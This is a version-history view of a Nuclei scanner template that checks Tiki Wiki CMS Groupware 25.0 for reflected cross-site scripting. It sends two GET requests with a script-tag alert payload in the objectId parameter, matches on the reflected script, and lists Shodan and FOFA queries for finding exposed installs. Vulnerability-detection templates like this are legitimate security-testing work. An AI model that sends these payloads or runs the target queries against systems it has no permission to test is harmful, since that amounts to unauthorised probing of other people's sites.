nuclei-templates/http/vulnerabilities/other/tikiwiki-xss.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2023-01-22 19:28:22 +00:00
id: tikiwiki-xss
info:
name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
2023-01-23 04:50:26 +00:00
Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
reference:
2023-01-22 19:28:22 +00:00
- https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 2
2023-01-22 19:28:22 +00:00
shodan-query: http.html:"tiki wiki"
product: tikiwiki_cms\/groupware
vendor: tiki
fofa-query: body="tiki wiki"
tags: edb,xss,tikiwiki,packetstorm,acketstorm
2023-01-22 19:28:22 +00:00
http:
2023-01-23 04:50:26 +00:00
- method: GET
path:
- "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
- "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
2023-01-22 19:28:22 +00:00
2023-01-23 04:51:13 +00:00
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
2023-01-22 19:28:22 +00:00
matchers-condition: and
matchers:
2023-01-23 04:50:26 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Tiki Wiki CMS'
condition: and
2023-01-23 09:47:20 +00:00
- type: word
part: header
words:
- "text/html"
2023-01-22 19:28:22 +00:00
- type: status
status:
- 403
# digest: 4a0a0047304502207471d3c3d46361100c98a06c65d8f1df0635f294db83cc0750e6006797e2d6a5022100db5a63f13709b058f70ad58a93d07d46f94a6dcb9ae02aa0eb3c202ee15e4bf2:922c64590222798bb761d5b6d8e72950